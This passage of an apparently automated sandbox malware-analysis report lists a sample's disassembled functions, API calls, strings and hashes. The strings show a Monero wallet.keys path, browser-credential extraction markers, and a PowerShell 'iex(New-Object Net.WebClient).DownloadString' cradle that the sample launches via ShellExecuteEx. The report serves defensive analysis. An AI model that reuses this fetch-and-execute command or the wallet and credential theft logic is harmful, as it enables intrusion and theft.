                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                        • LocalFree.KERNEL32(006D148F), ref: 006D9A90
                        • CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 314b70e04b1de503e461edf0e87e546d780d8ff9a3c78479cc97f5b93bb86b57
                        • Instruction ID: b54ea5b130970fa97194fc67899d5277ebb1eb7855b6e139cdc4e0c221fdc817
                        • Opcode Fuzzy Hash: 314b70e04b1de503e461edf0e87e546d780d8ff9a3c78479cc97f5b93bb86b57
                        • Instruction Fuzzy Hash: 933103B4E01209EFDB14CFA4C985BEE77B6BF48350F108159E901A7390D779AA81CFA1
                        Function 006E9260 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(,?,?,?,006E140C,?,00E4E0E0,00000000), ref: 006E926C
                        • lstrcpyn.KERNEL32(0091AB88,,,?,006E140C,?,00E4E0E0), ref: 006E9290
                        • lstrlen.KERNEL32(?,?,006E140C,?,00E4E0E0), ref: 006E92A7
                        • wsprintfA.USER32 ref: 006E92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s$
                        • API String ID: 1206339513-2079566551
                        • Opcode ID: 8dc59fde0fad51cc4c23287703ca13905746424283d45c28cfed7a783c6193c9
                        • Instruction ID: 782a7170d442a431ee5323ea723aadb1e600da4c719fab320a3cd4a6809f5fd1
                        • Opcode Fuzzy Hash: 8dc59fde0fad51cc4c23287703ca13905746424283d45c28cfed7a783c6193c9
                        • Instruction Fuzzy Hash: F401E975655248FFCB04DFE8D984EEE7BB9EF44364F108148F9098B241C631AE40DB91
                        Function 006E2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E2D85
                        Strings
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 006E2D04
                        • ')", xrefs: 006E2CB3
                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 006E2CC4
                        • <, xrefs: 006E2D39
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 3031569214-898575020
                        • Opcode ID: c360f07c747113f6ecb028bcaa91fb733ffdd61aa7e6198d84b16714d8a044ed
                        • Instruction ID: 58d9040233fc5b64b6e7a7bdf9d092e0097a8bfc7a3bee2f33095e2c49a625f8
                        • Opcode Fuzzy Hash: c360f07c747113f6ecb028bcaa91fb733ffdd61aa7e6198d84b16714d8a044ed
                        • Instruction Fuzzy Hash: C241FF71C123489AEB54EBE1C892BEEB776AF10300F41411DE106A7196EF743A4ACF99
                        Function 006D9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                        Download Yara Rule
                        APIs
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006D9F41
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: 3520d2fc9e5125688771d62677cc27d57a68b570510b3c25739943fd265ec6ab
                        • Instruction ID: 97d59ee9959dd5afbe50c55c72f6ddfee57e487d3df6798b10a30547d9b77d6c
                        • Opcode Fuzzy Hash: 3520d2fc9e5125688771d62677cc27d57a68b570510b3c25739943fd265ec6ab
                        • Instruction Fuzzy Hash: DC615070A11248EBDB24EFE4DD96FEE777AAF45304F008118F9095F281EB746A06CB56
                        Function 006E40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,00E4DBE0,00000000,00020119,?), ref: 006E40F4
                        • RegQueryValueExA.ADVAPI32(?,00E4DEB8,00000000,00000000,00000000,000000FF), ref: 006E4118
                        • RegCloseKey.ADVAPI32(?), ref: 006E4122
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4147
                        • lstrcat.KERNEL32(?,00E4DF30), ref: 006E415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 391cf1db65b52afbd2d6a75d8b103a5d2c12a77d560cc1db3e5750cf0b18d010
                        • Instruction ID: 50b3549f06dc832f58ab2a705fad9874ecbeaad2364069385ca1377bc18a4a90
                        • Opcode Fuzzy Hash: 391cf1db65b52afbd2d6a75d8b103a5d2c12a77d560cc1db3e5750cf0b18d010
                        • Instruction Fuzzy Hash: E4418AB6D102086BDB14EBE0EC56FFE733DAB48300F40855DB61557181EAB55F88CB92
                        Function 006E7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,00E3C470,00000000,00020119,?), ref: 006E7E5E
                        • RegQueryValueExA.ADVAPI32(?,00E4DD40,00000000,00000000,000000FF,000000FF), ref: 006E7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 006E7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 02514fb8a0c3350726543fd8ef96af5a35927b6de0eb5b40a528cf0867c6447b
                        • Instruction ID: 715e1503b1d2b24e900531486c518e0f983f177c84272086e49d9107ffdf1262
                        • Opcode Fuzzy Hash: 02514fb8a0c3350726543fd8ef96af5a35927b6de0eb5b40a528cf0867c6447b
                        • Instruction Fuzzy Hash: 0E118CB1A49309EBD710CF95DD4AFBBBBB9EB04B10F108159F605A7280D7745D01DBA1
                        Function 006D12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D12B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D12BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006D12D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006D12F5
                        • RegCloseKey.ADVAPI32(?), ref: 006D12FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: dc3c9f6cc9292079300ebfaf3c16ed2ce26ca727333d4b870daafa994de58dd7
                        • Instruction ID: dc869b647b80a882130f1463d95f96e4299da69a07a079683cafb1136c92e740
                        • Opcode Fuzzy Hash: dc3c9f6cc9292079300ebfaf3c16ed2ce26ca727333d4b870daafa994de58dd7
                        • Instruction Fuzzy Hash: 020131B9B54208BBDB00DFE4DC49FEEB7B8EB48701F008199FA1597280D6759A01DF51
                        Function 006EC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: c61eec155d13f9c3f32ccf0d3857a3929d05a046bfa487b41f5511b3958022f8
                        • Instruction ID: e2507a5e2588f127d2da88531f4281443dd94bc9b6f34414287f464b9beee870
                        • Opcode Fuzzy Hash: c61eec155d13f9c3f32ccf0d3857a3929d05a046bfa487b41f5511b3958022f8
                        • Instruction Fuzzy Hash: B04125711017CC5EDB218B258D84FFB7BEA9B41314F1444E8E98A86183D2719A46DF24
                        Function 006E6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 006E6663
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E6726
                        • ExitProcess.KERNEL32 ref: 006E6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 95462508b05d9bb7bea95b213a967fc142dc6b6cb3986e6b4d3e4fb59df6ede8
                        • Instruction ID: 920a859ad89e50f15d812a1e8780c8549b5aa9ff163083a16412b1d29c0350d4
                        • Opcode Fuzzy Hash: 95462508b05d9bb7bea95b213a967fc142dc6b6cb3986e6b4d3e4fb59df6ede8
                        • Instruction Fuzzy Hash: 173149B1D12348AADB95EB91DC82BDEB779AF04300F404198F20966192DF746B49CF6A
                        Function 006E87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006F0E28,00000000,?), ref: 006E882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E8836
                        • wsprintfA.USER32 ref: 006E8850
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 2f8cedc636541ffa06f17bbc752a09942b2b623b2118aa4fe41f40b960ef3702
                        • Instruction ID: 77eb27bc5a32e75a170e41fefa5c47be4035679cf2024e7578d9bd3b0f54ac73
                        • Opcode Fuzzy Hash: 2f8cedc636541ffa06f17bbc752a09942b2b623b2118aa4fe41f40b960ef3702
                        • Instruction Fuzzy Hash: 0C214AB1A55208AFDB00DF98DD49FEEBBB8FB48710F108159F605A7280C779AD01DBA1
                        Function 006E8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006E951E,00000000), ref: 006E8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E8D62
                        • wsprintfW.USER32 ref: 006E8D78
                        Strings
                        Memory Dump Source
